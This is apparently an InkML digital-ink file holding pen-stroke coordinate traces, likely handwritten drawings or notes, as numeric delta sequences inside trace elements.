16,59-20-16,-99 0 15,59 0 1,-20 0-16,-19 0 16,-20 0 109,-20-20-110,0 0-15,0 0 16,0 0 0,0 0-16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08.9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005 13216 0,'20'0'63,"19"0"-47,41 0-16,78 0 15,41 0-15,-1 0 16,21 0-1,-1 20-15,-59-20 0,-20 39 16,-80-39 0,-39 0-16,20 20 15,-21-20-15,21 0 16,0 0-16,-20 0 16,0 0-16,19 0 15,-19 0-15,20 0 16,-20 0-1,19 0-15,1 0 16,0 0-16,-1 0 16,21 0-16,-1 0 15,1 0-15,19 0 16,-19 0-16,-1 0 16,-19 0-1,-20 0-15,0 0 16,-20-40 156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13.5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10 6103 0,'0'-18'0,"18"1"16,-1 17 15,1 0-15,17 0-16,-17 0 15,0 0-15,-1 0 16,36 0-16,-18 0 15,1 0-15,17 0 16,0 0-16,17 17 16,1-17-16,35 0 15,-54 0-15,1 0 16,-35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14.3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69 7232 0,'0'0'0,"35"0"15,-35 18 1,18-18-1,-1 0 17,1 17 30,0-17-15,35 18-31,-18-18-16,0 0 15,0 0-15,1 0 16,-19 0-16,36 0 16,-35 0-16,35-18 15,-18 18-15,0 0 16,-17 0 4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45.9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721 9979,'19'0,"17"0,18 0,19 0,18 0,17 0,1 0,18 0,18 0,19 0,35 0,-35 0,17 0,0 0,19 0,-37 0,19 0,-73 0,-1 0,19 0,-54 0,-19 0,-17 0,-19-19,0 19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15.2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45 8802 0,'18'0'63,"0"0"-63,-1 0 15,1 0-15,0 0 16,-1 0 0,36 0-16,-18 0 15,1 0-15,17 0 16,0 0-16,-36 0 16,1 0-16,17 0 15,-17 0-15,-1 0 141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16.4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10 10989 0,'18'0'16,"17"0"-1,-17 0 1,35-18 0,0 18-16,-1 0 15,37 0-15,-36 0 16,17 0-16,-17 0 15,-18 0-15,1 0 16,-19 0-16,-17 18 16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17.4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39 13847 0,'18'-18'32,"17"0"-17,18 1 1,-17 17-16,-1-18 16,35 0-16,36-17 15,-70 17-15,16 18 16,1 0-16,0 0 15,-17 0-15,-1 0 16,0 0 0,0-17-16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29.4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98 1252 0,'0'0'0,"0"18"0,0 17 15,0 1 1,-17-19-16,-19 1 16,-17 17-16,-35 0 15,18-17 1,-54 35-16,-52 53 0,-18-18 16,0 18-16,-71 0 15,71-18 1,-18 35-16,36 1 15,17-18-15,71-36 16,35 1-16,18-1 16,35-17-16,0 35 15,282 248 1,-35-231 0,35-52-16,18 53 15,-71-53-15,18-18 16,-141-35-16,18 18 15,-54-18-15,-17 0 16,0 0-16,-35 0 16,-1 0-16,19-18 15,-19 1-15,19-36 16,-36 17-16,17-16 16,1-1-16,-18-18 15,0-17-15,0-36 16,0 1-16,-88-71 15,17 18-15,-52-1 16,34 1-16,1 52 16,-35-34-16,17 52 15,18 18-15,0-1 16,-1 36-16,1-17 16,53 35-16,17 17 15,1 18-15,17 123 63,0 71-63,0 18 0,-36 0 15,1-1-15,-18 54 16,35-18 0,-52-18-16,17 53 15,0 18-15,0 71 16,18-54-16,-18 89 15,-35 105-15,52-193 16,-16-1-16,34-140 16,0-71-16,18-89 15,18-105 32,17-35-31,18-54-16,18 36 15,-36 0 1,53-35-16,-17-18 0,-18-18 16,52-17-16,-34-36 15,17-35 1,-52 71-16,-19-18 0,18 35 16,-17 1-16,17 52 15,1-17 1,17 34-16,-18 19 15,0 35-15,-17 17 16,35-17-16,-18 35 16,0-18-1,-17 71-15,-18-17 16,17-18 78,-17-1-79,18 19-15,0-19 16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14.1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98 6052 0,'20'0'78,"20"0"-62,59 0-16,60 0 16,59 0-16,0 0 15,20 0-15,-39 0 16,19 0-16,-59 0 15,20 0-15,-21 0 16,-39 0-16,0 0 16,-59 0-16,59 0 15,40 0-15,-40 0 16,40 0 0,19 20-16,-39 0 0,20 0 15,-20-1 1,-40-19-16,-20 20 15,-19-20-15,-20 0 16,-1 0-16,-19 0 16,0 0 156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16.4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55 7640 0,'0'0'0,"20"-20"0,-1 20 16,1 0-16,0 0 15,20-20-15,-1 20 16,21 0-16,19 0 16,40 0-16,20 0 15,99 0-15,-19 0 16,19 0-16,-20 0 16,0 0-16,1 0 15,-21 0-15,-138 0 16,98 0-1,-39 0-15,20 0 0,-59 0 16,39 0-16,-20 0 16,0 0-1,-39 0-15,-1 0 16,-19 0-16,-20 0 14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20.1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60 9168 0,'20'0'109,"20"0"-109,-1 0 16,41 0-16,19 0 15,40 0-15,20 0 16,19 0-16,-19 0 15,0 0 1,39 0-16,-19 0 16,-20 0-16,-100 0 15,60 0-15,-20 0 16,1 0-16,-21 0 16,0 0-16,1 19 15,-1-19-15,0 0 16,40 0-16,-39 0 15,59 0-15,0 20 16,19-20-16,-39 0 16,40 0-16,-40 0 15,-20 0-15,21 0 16,-101 0-16,81 0 16,-21 0-16,40 0 15,-20 0-15,40 0 16,20 0-16,-40 0 15,20 0 1,-20 0-16,0 0 0,-20 20 16,-39-20-1,-1 0-15,-19 0 0,-20 0 16,20 0 0,-21 0-16,1 0 15,0 0-15,0 0 16,0 0-16,0 0 15,-1 0-15,1 0 16,0 0-16,20 0 16,-20 0-16,0 0 15,19 0-15,1 0 16,19 0-16,-39 0 16,0 0-16,0 0 15,0 0 1,0 0 15,-1 0-15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23.4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78 10715 0,'0'-19'47,"20"19"-31,-1 0-1,1-20 1,0 20-16,20 0 16,-1 0-16,41 0 15,-1 0-15,80 0 16,19 0-16,-118 0 16,119 0-16,-1 0 15,-19 0-15,-20 0 16,-60 0-16,20 0 15,21 0-15,-21 0 16,-40 0-16,21 0 16,-1 0-16,0 0 15,40 0-15,-19 0 16,39 0-16,0 0 16,-40 0-16,0 0 15,-59 0-15,39 0 16,-19 0-16,-1 0 15,1 0-15,-21 0 16,21 0 0,19 0-16,1 0 0,19 0 15,60 0 1,-21 0-16,1 20 16,-20-20-16,-39 19 15,-41-19-15,-19 0 16,0 0 124,20 0-124,0 0 0,-1 0-16,-19 0 15,0 0-15,0 0 16,19 0-16,21 0 16,-1 0-16,41 0 15,19 40-15,-20-20 16,0 0-16,-79-20 15,0 0-15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26.6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95 13474 0,'20'0'110,"0"0"-95,0 0-15,59 0 16,0 0-16,21 0 16,-21 0-16,0 0 15,1 0-15,-1 0 16,-19 0-16,19 0 16,-19 0-1,-1 0-15,1 0 16,-21 0-16,-19 0 15,20 0-15,-20 0 16,19 0-16,-19 0 16,0 0-16,0 0 15,0 0-15,39 0 16,-19 0-16,0 0 16,-1 0-16,1 0 15,20 0-15,19 0 16,-20 0-16,1 0 15,-20 0-15,-20 0 16,19 0-16,1 0 16,0 0-1,-1 0-15,1 0 16,39 0 0,-19 0-16,39 0 0,-19 0 15,-1 0-15,40 0 16,-40 0-16,-19 0 15,-20 0-15,-21 0 16,21 0-16,0 0 16,19 0-1,1 0-15,-1 0 16,21 0 0,-1 0-16,0 0 15,1 0-15,19 0 16,0 0-16,-39 0 15,19 0-15,1 0 16,-1 0-16,20 0 16,20 0-16,-20 0 15,40 0-15,-59 0 16,39 20-16,-20-1 16,20 1-16,-99-20 15,59 0-15,-19 0 16,-40 0-16,19 0 15,-19 0 1,0 0 15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4:57.8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922 4410 0,'18'0'31,"0"0"-15,-1 0-16,36 0 16,-17 0-16,17 0 15,-1 0-15,1 0 16,18 0-16,-1 0 15,19 0-15,17 0 16,-18 0-16,18 0 16,-36 0-16,18-18 15,0 0-15,-35 1 16,-17 17-16,-19 0 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47.1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26 11103,'18'0,"0"0,0 0,18 0,-17 0,17 0,0 0,19 0,35 0,37 0,18 0,1 0,53 0,-17 0,90 0,-55 0,19 0,55 0,-74 0,19 0,18 0,-72 19,-37-19,0 0,-18 0,-18 0,-37 0,-35 0,-19 0,0 0,-36 0,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5:02.8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15 6068 0,'17'0'16,"1"0"-1,0 0-15,17 0 16,-18 0-16,1 17 16,17-17-16,18 18 15,0 0-15,53-1 16,-18-17 0,53 0-16,36 0 15,-1 0-15,18 0 16,-106 0-1,-17 0-15,-53 0 0,-1 0 16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5:04.1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67 7743 0,'0'-17'31,"18"17"-15,0 0-1,-1 0-15,36-18 16,-18 18-16,1 0 16,17 0-16,0 0 15,35 0 1,35 0-16,18 0 15,0 0-15,1 0 16,-19-17-16,-35 17 16,-52 0-16,-19 0 15,-17-18 11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5:05.1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13 7444 0,'0'0'0,"18"35"0,87 0 15,-52-17-15,-17-18 16,-1 0-16,0 0 15,0 17-15,1-17 16,-19 0-16,1 0 16,17 0-16,-17 0 15,35 0-15,-18 0 16,0 0-16,-17 0 16,0 0-1,-1 0 16,1 0-15,0 0-16,17 0 16,-18 0-16,1-17 15,17 17-15,-17 0 78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5:07.0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68 9278 0,'0'-35'47,"17"35"-31,1-18-1,52 18-15,-17 0 16,35 0-16,1 0 16,16 0-16,-16 0 15,17 18-15,17 17 16,-17-17-16,0-18 15,-1 17-15,-52 1 16,-17-18-16,-19 0 16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5:22.3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58 10583 0,'0'0'0,"18"0"16,-1 0 0,1 0-1,-1 0-15,1 0 16,35 0-16,0 18 15,0-18-15,0 18 16,35-18-16,-17 0 16,34 0-16,1 0 15,-53 0-15,0 0 16,-18 0-16,-17 0 31,0 0-15,-1 0-1,-4074 0-15,8167 0 16,-4092 0 0,-1 0-16,1 0 15,17 0-15,-17 0 16,35 0-16,0 17 16,-36 1-16,36 0 15,-35-18 1,17 0-16,-17 0 15,0 0 1,-1 0 0,1 0 15,-1 0-15,1 0-1,0 0 1,17 0-16,-35 17 15,18-17-15,-1 18 16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5:45:27.6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75 1305 0,'0'18'31,"-36"0"-31,-52-1 16,-35 18-16,-36 18 15,-70 0-15,-36 36 16,-88 16-16,-35 19 15,-35 17-15,-36 53 16,142-53-16,-106 124 31,264-124-31,53-35 0,35-18 16,1 0-16,52-17 16,18-19-16,0 19 15,0-18-15,71 123 31,70-52-31,35-18 16,1-1-16,70 1 16,0 0-16,-53-53 15,-18-35-15,-35-1 16,0 1-16,-17 0 16,-1-1-16,1-17 15,-36 0-15,18 0 16,-18 0-16,-35 0 15,-18 0-15,0-35 16,18-53-16,0-71 16,-18 0-16,-17-52 15,-18-19-15,-35-17 16,-36 36-16,-35-36 16,-52 0-16,16 53 15,19 17-15,0 1 16,-1 53-16,18 17 15,53 35-15,-35-17 16,53 53-16,0-1 16,17 19-16,0-1 15,1 18 79,-1 35-94,-17 36 16,-1 17-16,1 18 15,0-35-15,-18 52 16,18 0-16,-1 1 16,1 52-16,-18 1 15,36-19-15,-19 89 16,1-17-16,0 70 15,35-18-15,0 53 16,0-70-16,0-54 16,0-17-16,0-35 15,0-71-15,0 18 16,0-71-16,0-17 16,0 17-16,0-17 15,0-1 1,0 1-1,0 0 1,0 17-16,0 0 16,0-17-1,0 35 1,0-36-16,0 19 16,17-19 46,54-52-62,88-106 16,52-71-16,89-88 15,71-35-15,34-35 16,142-124-16,-176 141 16,-19-52-16,-87 16 15,-124 107 1,-35 35-16,-53 53 0,-18 18 15,-35 17-15,0 36 16,0 34 0,-18 1-16,-17 35 15,18 36-15,17-19 0,-18 19 16,18-1 46,18 18-46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41.5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002 4623 0,'20'0'63,"59"0"-48,-19 0 1,19 0-16,20 0 16,-59 0-16,19 0 15,1 0-15,0 0 16,19 0-16,-20 0 15,21 0-15,-1 0 16,20 0-16,-19 0 16,39 0-16,-40 0 15,-19 0-15,-40 0 16,19 0-16,-19 0 16,0 0-16,0 0 140,0 0-124,-1 0-1,41 0-15,39 0 16,20 0-16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42.4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236 4484 0,'20'0'31,"0"0"-16,20 0-15,-20 0 16,39 0-16,1 0 16,19 0-16,40 0 15,20 0 1,40 0-16,19 0 16,20 0-16,1 0 15,-160 0-15,100 0 16,19 0-16,-19 0 15,-20 20-15,-20-20 16,-59 0-16,-40 0 16,-1 0-1,1 0 48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46.8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67 8910 0,'20'0'62,"39"-20"-46,60 20-16,60 0 15,39 0-15,-20 0 16,41 0-16,-41 0 16,-39 20-16,-100-1 15,60 21-15,-59 0 16,-20-20-16,-21-20 15,1 0 1,20 0 0,-20 0-1,19 19-15,21-19 16,0 20-16,-21-20 16,1 0-16,-20 0 15,-20 20 188,-20-20-203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51.6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47 10914 0,'20'0'78,"19"0"-78,21 0 16,39 0-16,40 0 16,39 0-16,-19 0 15,0 0-15,-20 0 16,0 0-16,-60 0 15,-19 0-15,-1 0 16,1 0-16,-21 0 16,21 0-16,59 0 15,0 0-15,-20 0 16,60 0-16,-20 0 16,-20 0-16,60 0 15,-80 0-15,-20 0 16,40 20-16,-19-20 15,-1 20-15,-40-20 16,21 0-16,-21 0 16,1 0-16,-1 0 15,-19 0 1,-20 0-16,0 0 16,-1 0-1,1 0-15,0 0 16,20 0-1,0 0 1,-21 0-16,1 0 16,20 0-16,-20 0 15,0 0 1,-1 0 0,21 0-1,-20 0-15,20 0 16,19 0-16,1 19 15,-1-19-15,1 0 16,-21 0-16,1 0 16,-20 0-1,0 0-15,0 0 32,0 0-32,-1 0 46,1 0-30,0 0 0,0 0-1,0 0 1,0 0-16,-1 0 16,1 0-1,0 0 1,0 0-16,20 0 15,-21 0-15,1 0 16,0 0 0,0 0 15,0 0-15,0 0-1,0 0 1,-1 0-1,1 0 64,0 0-64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52.1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147 11267,'18'0,"1"0,-1 0,0 0,18 0,0 0,1 0,-1 0,0 0,19 0,17 0,-17 0,-19 0,37 0,35 0,-35 18,54-18,-54 0,-1 0,1 0,-1 0,37 0,-36 0,17 0,19 0,36 0,73 0,18 0,54 0,1 0,-74 0,55 18,-54 0,18 18,-36 19,-37-1,-18 1,36-19,-35-18,-56-18,19 18,-36-18,-19 0,1 0,-19 0,0 0,-18 0,19 0,-1-18,18 0,19 18,36-18,0 0,-19 0,-17 18,-1 0,-17 0,-1 0,-17 0,-19 0,0-19,0 19,0 0,0-18,0 18,1 0,-1-18,0 18,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52.9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32 12303 0,'20'0'32,"20"0"-17,79 0-15,20 0 16,39 0-16,1 0 16,-20 0-16,-40 0 15,-40 0-15,-59 0 16,0 0-16,0-20 15,-40 20 126,20-20-14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54.8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20 13632 0,'20'-19'32,"19"19"-32,21-20 15,19 20-15,20 0 16,20 0-16,20 0 15,-59 0-15,19 0 16,-20 0-16,1 0 16,19 0-16,-40 0 15,1 0-15,-1 0 16,61 0-16,-1 0 16,79 0-16,-19 0 15,39 0-15,20 0 16,0 0-16,-59 0 15,-20 0-15,-1 0 16,-39 0-16,-59 0 16,-1 0-16,-19 0 15,0 0-15,-1 0 16,-19 0-16,20 0 16,0 0-1,-1 0-15,1 0 16,20 0-16,-21 0 15,21 0-15,-21 0 16,21 0-16,-40 0 16,39 0-16,-39 0 15,20 0-15,0 0 16,-1 0-16,1 0 16,0 0-16,-20 0 15,-1 0-15,1 0 16,0 0 203,0 0-204,0 0-15,0 0 16,19 20-16,-19-1 15,0-19 1,0 0 93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56.2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89 15220 0,'20'0'0,"0"0"15,20 0 1,-20 0-16,19 0 16,21 0-16,-60-20 15,59 20-15,-39 0 16,40 0-16,19 0 15,-19 0-15,-21-20 16,1 20-16,-20 0 16,-20-20-16,20 20 15,-20-19 142,20 19-142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7:58.9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84 15498 0,'20'0'31,"0"0"-31,19-20 16,21 20 0,39 0-16,100 0 15,-1 0-15,20 0 16,20 0-16,-59 0 16,-20 0-16,-20 0 15,-80 0-15,-39 0 16,0 0-16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8:00.0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61 15180 0,'0'-20'15,"19"20"1,1 0-16,40 0 16,39 0-16,80 0 15,19 0-15,60 0 16,0 0-16,-79 0 15,-40 0-15,-80 0 16,-39 0-16,20 0 16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8:03.3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88 15141 0,'20'0'31,"139"0"-31,59 0 16,80 0-16,19 0 16,21 0-16,-60 0 15,-20 0-15,-100 0 16,-19 0-16,-79 0 15,-21 19-15,-19 1 16,0-20 15,0 0-31,0 0 16,-20 20 0,20-20-16,0 0 15,-1 0 1,1 0-1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8:14.6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713 15200 0,'19'0'141,"41"0"-125,0 0-16,-1 0 15,1 0-15,-21 0 16,21 0-16,-1 0 15,-19 0-15,20 0 16,19 0-16,-19 40 16,59-1-1,-60-39-15,1 20 0,-41 0 16,1-20 0,0 0 15,0 0-16,20 0 1,-20 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,0 0-16,-1 0 15,1 0 1,0 0 15,0 0-15,0 0-16,0 0 16,39 0-16,-19 0 15,-20 0-15,0 0 16,-1 0-16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8:17.8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47 16867 0,'20'0'62,"79"0"-46,40 0-16,-20 0 16,20 0-16,0 0 15,-20 0 1,-60 0-16,41 0 15,-1 0-15,40 0 16,-40 0-16,20 0 16,-20 0-16,20 0 15,-59 0-15,-1 0 16,1 0-16,-1 0 16,1 0-16,-20 0 15,19 0-15,20 0 16,-19 0-16,19 0 15,-19 0-15,-20 0 16,19 0-16,40 0 16,-19 0-16,-1 0 15,0 0-15,-19 0 16,-20 0-16,-1 0 16,-19 0-16,0 0 15,0 0 16,0 0-15,19 0 0,1 0-1,39 0-15,-19 0 16,0 0-16,-1 0 16,-19 0-16,19 0 15,-19 0-15,-20 0 16,39 0-16,1 0 15,-1 0-15,1 0 16,59 0-16,-40 0 16,-59 0-16,40 0 15,-21 0-15,1 0 16,-20 0-16,0 0 16,0 0-1,0 0-15,-1 0 16,1 0-1,0 0 1,0 0-16,0 0 16,0 0-1,-1 0-15,21 0 16,20 0 0,19 0-16,-39 0 15,39 0-15,-19 0 16,-41 0-1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8:18.7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521 16768 0,'-19'0'32,"58"0"61,41-20-93,59 20 16,19 0-16,21 0 16,-1 0-16,61 0 15,19 0-15,39 0 16,-19 0-16,0 0 15,-20 0-15,-20 0 16,-59 0-16,-41 0 16,-78 0-16,-40 0 15,59 0-15,-39 0 16,19 0-16,-19-20 16,20 20-16,-21 0 15,-19 0 1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6:58.2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615 12418 0,'17'-18'94,"1"18"-94,17 0 15,0 0-15,1 0 16,-1 0-16,-17 0 16,-1 0 15,1 0-31,0 18 31,-18-1-31,0 1 16,0 0-16,17-1 15,-17 1-15,0 17 16,0-17-16,0 17 16,0-17-16,0-1 15,0 1-15,0 17 16,0-17-16,0 17 15,0-17 1,-17 35-16,-19-18 16,1 0-1,0 1-15,17-19 16,-17 19-16,0-19 31,17-17-15,-17 18-16,-1-18 15,1 0-15,0 0 16,17 0-16,0 0 31,1 0 1,17-18-1,0 1-16,35 17 48,0 0-63,1 0 0,34 0 16,-17 0-16,0 0 15,18 0 1,-54 0-16,19 0 15,-19 0 17,1 0 108</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1946.4597">7038 12083 0,'0'17'156,"0"1"-156,0 0 16,0-1 0,0 18-1,0-17 1,0 0 15,0-1 47,0 1-47,0 0 16,-18-18 0,1 0-31,-1 0-1,0 0-15,1 0 16,-1 0 47,36 0 202,-1 0-234,1 0-15,0 0 15,-1 0-15,1 0 15,0 0 32,-1 0 15,1 0-63,-1 0 79,1 0 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5256.6203">8572 12506 0,'0'-18'94,"18"1"-78,0 17 15,-1 0-15,1 0-1,0 0 1,-1 0-1,1 0-15,0 17 16,17-17 0,-17 0-1,-18 18-15,17-18 16,-17 18 0,18-1-16,-1-17 31,-17 18-31,0 0 0,0 17 31,0-18-15,0 1-16,0 0 15,0-1 1,0 1 0,0 0-16,-17-1 15,17 1 1,-18 0-16,1-18 15,-1 17-15,-35 1 16,35-18-16,1 0 16,-1 0-1,0 0-15,1 0 32,-1 0-32,36 0 203,17 0-203,-17 0 15,-1 0-15,1 0 32,0 0-17,17 0 16,-35-18-15,18 18-16,-1 0 31,-17-17-31,18 17 32,-1 0-32,1 0 15,0-18 16,-1 18 1,1 0-1,0 0-31,-1 0 78,-17-18 63</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="6263.9976">8943 12065 0,'0'18'62,"0"-1"-46,0 19-1,0-19-15,0 1 16,18-1 0,-1-17-1,-17 18 48</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="8781.1065">10354 12365 0,'18'0'0,"-1"0"78,-17-18-63,18 18 1,0 0-16,-1 0 16,1 0-1,0 0-15,-1 0 16,18 0-16,1 0 16,-19 0-16,1 0 15,0 18 1,-1-18-1,-17 17-15,18 1 16,-18 0 0,18-18-16,-18 17 15,17 1-15,-17 17 16,0-17-16,0 0 16,0-1-16,0 19 15,0-19-15,0 1 16,0 17-16,0 18 15,0-18 1,0-17-16,-17 52 16,-1-34-1,0-1 1,1-17-16,-1-1 16,0-17 15,1 0-31,-1 0 15,0 0 1,1 0-16,-18 0 31,17 0-31,0 0 16,1 0 15,17-17 94,35 17-94,-17 0-31,-1 0 16,18 0-16,1 0 16,-1 0-16,18 0 15,-35 0-15,17 0 16,-18 0-16,36 0 16,-35 0-1,-18-18-15,18 18 31,-1 0 16,1 0-47,0 0 32,-1 0-17,1 0 48,-1 0-48,1 0 1,-18-18 31,0 1 31</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="10272.3832">10971 12136 0,'-17'0'32,"-1"0"-1,0 0 0,1 0-31,-1 0 16,1 0-1,-1 0 17,0 0-17,1 0 1,17 17 0,-18 1-1,0-18 1,1 17-16,17 1 15,0 0 1,0-1-16,0 1 31,0 0-15,0-1 0,17-17-1,1 0 16,0 0-31,-1 18 16,1-18 0,0 0-16,-1 0 15,1 0 1,-1 0-16,1 0 16,0 0-1,-1 0 1,-17-18-1,18 18-15,0 0 16,-1-17 0,1 17-1,-18-18 32,0 0-31,0 1 15,-18 17 32,1 0-32,-1 0-31,0-18 15,1 0 1,-1 18-16,0-17 16,1 17-16,-1-18 1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53.5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31 12682,'0'0,"18"0,1 0,17 0,36 0,19 0,36 0,18 0,0 0,19 0,17 0,1 0,17 0,1 18,-19-18,1 0,-37 0,0 0,-36 0,36 0,-18 0,18 0,-18 0,18 0,-18 0,18 0,0 0,-36 0,18 18,0-18,18 0,-18 0,-36 0,36 0,-36 0,36 0,-18 0,-37 0,19 0,18-18,-37 0,-17 18,-1-18,1 18,-19 0,0-18,-18-1,19 1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38.8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91 8978 0,'0'18'78,"-35"-1"-78,-71 1 16,-18-18-16,19 0 15,-1 0-15,18 0 16,35 0-16,35 0 16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39.4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278 9243 0,'0'0'0,"-88"-35"0,0 17 15,-36-17-15,1-1 16,-36 19-16,0-1 16,18 0-16,-35 1 15,35-1-15,17 18 16,36 0-16,17 0 16,54 0-16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40.1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201 9013 0,'0'0'0,"-36"-17"16,19 17 0,-54 0-16,-35 0 15,18 0-15,18 0 16,-54 0-16,36 0 15,-35 0-15,17 0 16,17-18-16,1 1 16,53 17-16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44.7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79 11553 0,'36'0'78,"140"0"-62,-17 0-16,35 0 16,-18 0-16,18 0 15,-17 0-15,34 0 16,-17 0-16,0 0 16,-35 0-16,0 0 15,158 0 1,-176 0-16,18 0 15,0 0-15,-18 0 16,35 0-16,-35 0 16,18 0-16,-35 0 15,-18 0-15,-1 0 16,-16 0-16,16 0 16,19 0-1,-71 0 1,-36 0-16,19 0 0,-1 0 15,-17-17-15,-1 17 16,1 0 0,35 0-16,0 0 0,-36-18 15,36 18-15,-17-17 16,-1 17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1.5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59 14006,'18'0,"37"0,-1 0,37 0,-19 0,37 0,0 0,18 0,-18 0,36 0,0 0,0 0,0 0,37 0,-1 0,1 0,35 0,1 0,0 0,-37 0,1 0,-19 0,-18 0,-18 0,-36 0,-37 0,1 0,-37 0,0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2.6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789 14079,'18'0,"0"0,18 0,-18 0,1 0,-1 0,0 0,18 0,-18 0,19 0,17 0,0 0,19 0,18 0,18 0,-37 0,1 0,-19 0,1 0,17 0,1 0,36 0,36 0,0 0,-18 18,-55-18,19 0,36 0,-36 0,18 0,18 0,-55 0,19 0,-37 0,-17 0,-19 0,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4.4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760 14061,'18'0,"0"0,0 0,0 0,1 0,-1 0,18 0,-18 0,0 0,0 0,1 0,-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5.6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216 14043,'18'-19,"18"1,0 18,-18-18,55 18,36 0,-18 0,-1 0,74 0,-1 0,-18 0,18 0,37 0,-19 0,-17 0,-19 0,-55 0,-35 0,-1 0,-72 0,-18 0,0 0,-1 0,1 0,18 0,-18 18,-1-18,19 0,0 0,0 0,-18 0,17 0,1 0,-36 0,36 0,-37 0,19 0,-18 0,35 0,-17 0,0 0,0 0,-1 0,1 0,18 0,0 0,-19 0,19 0,-18 0,18 0,-18 0,17 0,1 0,0 0,0 0,0 0,-18 0,17 0,1 0,0 0,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6.4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488 14823,'-18'-18,"18"-1,0 1,-19 18,1 0,0 0,-36 0,-19 0,19 0,-73 0,36 0,-18 0,18 0,55 0,18 0,36 0,0 0,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7.3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628 14696,'-19'0,"1"0,-18 0,0 0,-19 0,19 0,0 0,-1 18,19-18,0 0,0 0,0 0,0 0,0 0,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55.6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06 12845,'19'0,"-1"0,18 0,0 0,19 0,17 0,37 0,0 0,18 0,36 0,19-18,-55 18,18 0,-36 0,18 0,-73 0,-18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29:48.4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40 14768,'-36'0,"-1"0,-53 0,-1 0,-54 0,0 0,18 0,36 0,0-18,55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7:39.0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22 847 0,'-18'17'0,"1"1"16,-19-18-16,19 18 15,-36 17 1,17-35-16,-17 35 0,-17 0 16,-18-17-16,0 17 15,17 1 1,-17 17-16,35-36 0,0 18 15,-18 1-15,36-19 16,18 19 0,-19-19-16,36 19 15,0 16-15,-17 1 16,17 36-16,0-19 16,0 18-16,0 1 15,53-37-15,35 37 16,18-19-16,17-35 15,0 1-15,54-36 16,-54 35-16,36-35 16,-35 18-16,-1-18 15,-17 0-15,35 0 16,-18 0-16,1 0 16,-36 0-16,-53 0 15,1 0-15,-72-18 78,1-35-78,0 18 16,-53-53-16,-1-1 16,-16 19-16,-36-18 15,-1-18-15,-16 35 16,-1-17-16,18 18 15,-4075-36 1,8150 18-16,-4005 17 16,0 18-16,36 0 0,18 0 15,-1 0 1,18 36 0,0 34 30,0 54-30,0-1-16,0 19 16,0-19-16,0 18 15,-18 18-15,18-18 16,0 36-16,0-1 16,0-34-16,0-1 15,0 35-15,18-17 16,-18-35-16,18 17 15,-18-18-15,17 1 32,-4074-36-32,8132 0 0,-4075-17 15,17 0 1,1-1 15,0-17 63,-1 0-78,1 0-1,17 0 1,-17-17-1,0-36-15,17 18 16,-18-54-16,19 1 16,-1-35-16,53-36 15,-17-35-15,-18 18 16,53-36-16,-54 18 16,37 17-16,-89 89 15,35 0-15,-35 70 16,0 1-16,18 17 156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8:14.1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662 3986 0,'70'0'63,"54"0"-63,-1-17 15,71 17-15,-35 0 16,18 0-16,34 0 16,36 0-16,71 0 15,-36 0-15,88 17 16,18 19-16,212-19 31,194-17 0,-724 0-31,-34 0 0,-19 0 32,1 0-17,0 0 1,-1 0-16,1 0 94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2:38:15.3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64 5380 0,'17'0'15,"19"0"1,-1-18 0,35 1-16,283-19 31,-106 36-31,-35 0 15,-53 0-15,-71 0 0,-35 0 16,0 0 0,0 18-16,-1 0 15,-16 17-15,17 0 16,-36-17-16,1-1 16,-18 1-1,-18-18-15,18 18 16,-17-18-16,-1 0 31,-17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9:12.1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95 6925 0,'20'0'140,"0"0"-124,0 0-16,-1 0 15,1 0-15,20 0 16,19 0 0,1 0-16,-20 0 15,19 0-15,21 0 16,-1 0-16,-20 0 16,1 0-16,-20 0 15,-1 0-15,21 0 16,-1 0-16,21 20 15,39 0-15,-40-20 16,-59 0-16,79 0 16,20 0-16,-39 0 15,-1 0-15,-19 0 16,-21 0-16,1 0 16,-20 0-16,0 0 15,0 0 1,-1 0-1,1 20-15,0-20 16,20 0-16,-20 0 16,-1 0-1,1 0 17,0 0-1,0 0-16,0 0 17,-20 20-32,20-1 15,19 1 1,1 0-16,39-20 16,21 40-16,-21-20 15,-59-20-15,39 20 16,-39-20-1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9:18.4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302 5596 0,'20'0'0,"0"0"16,20 0-1,0 0-15,98 0 16,-18 0-16,-41 0 15,119 0-15,40 0 16,20 0-16,0 0 16,0 0-16,-19 0 15,-1 0-15,-60 0 16,21 0-16,-60 0 16,19 0-16,1 0 15,0 0-15,19 0 16,1 0-16,39 0 15,-19 0-15,-1 0 16,-118 0-16,158 0 16,0 0-16,-40 0 15,1 0-15,-41 0 16,-39 0-16,-59 0 16,0 0-16,-41 0 15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09:24.1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89 8275 0,'20'0'110,"39"0"-95,1 0 1,39 0-16,0 0 15,40 0-15,0 0 16,-40 0-16,20 0 16,-79 0-16,79 0 15,-20 0-15,-19 0 16,-21 0-16,-19 0 16,19 0-16,1 0 15,-20 0-15,-20 0 16,19 0-16,-19 0 15,20 0 1,-1 0-16,21 0 16,-1 0-16,1 0 15,19 0-15,1 0 16,-60 0-16,59 0 16,-20 0-16,-39 0 15,20 0-15,-20 0 16,0 0-16,0 0 31,-1 0 0,21 19-31,20 1 16,-21-20-16,-19 0 16,79 20-16,-39-20 15,19 0-15,-39 0 16,20 0-16,-1 0 15,1 40-15,-1-20 16,1-20-16,-1 0 16,21 20-16,-21-20 15,-19 19-15,-1-19 16,1 0-16,-20 0 16,0 0-16,0 0 78,-1 0 31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1:51.8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74 1729 0,'0'0'0,"-123"141"15,52-53-15,-52 0 16,-1 0-16,-52 36 16,0-36-16,-18 35 15,-36 1-15,36-18 16,0 17-16,-70 1 15,87-1-15,1 1 16,52-1-16,18-35 16,36 18-16,17 18 15,18-1 1,35 53-16,0 1 0,106-1 16,70 36-16,124 35 15,123 53 1,142-53-16,70 0 15,-141-36-15,-106-87 16,-106-54-16,-88-34 16,-106-36-16,-53 0 15,1 0-15,-19 0 16,1-18-16,17-53 16,0 18-16,1-70 15,-1-18-15,-17-53 16,-18-18-16,0-52 15,-53-1-15,-88-88 16,-124-70 0,0-53-16,-105 70 0,-18 0 15,-53 18-15,88 88 16,89 53 0,-54 0-16,142 89 0,35 52 15,35 35-15,35 36 16,18 0-1,36 35-15,-1 0 0,-17 0 16,-18 35-16,-18 106 16,-35 71-1,53 17-15,-17 124 16,17 53-16,-18 176 16,71-194-16,0 53 